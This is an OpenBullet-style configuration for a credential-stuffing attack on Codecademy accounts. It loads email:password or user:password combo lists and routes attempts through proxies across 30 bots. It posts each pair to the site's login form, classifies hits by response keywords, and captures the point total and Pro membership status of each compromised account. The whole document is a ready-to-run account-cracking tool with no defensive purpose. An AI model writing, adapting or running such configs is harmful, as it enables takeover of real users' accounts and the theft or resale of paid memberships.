[SETTINGS]
{
  "Name": "Codecademy",
  "SuggestedBots": 30,
  "LastModified": "2018-06-03T20:24:12.0930503+00:00",
  "AdditionalInfo": "Points and Pro Membership Capture",
  "Author": "Robot",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#Login REQUEST POST "https://www.codecademy.com/login" AutoRedirect=TRUE 
  CONTENT "authenticity_token=KHVqLAKIjWxvCyfUlz9QqtMOKMnxadcJ5%2BfalUJjZlk%3D&redirect=&user%5Blogin%5D=<USER>&user%5Bpassword%5D=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://www.codecademy.com/login" 
  HEADER "origin: https://www.codecademy.com" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "I forgot my password" 
  KEYCHAIN Success OR 
    KEY "created_at\":\"" 
#Point_Capture PARSE "<SOURCE>" LR "total_points\":" ",\"roles" Recursive=FALSE -> CAP "Points" "" "" 
#Membership PARSE "<SOURCE>" LR "pro\":" ",\"pro_ads" Recursive=FALSE -> CAP "Pro" "" "" 
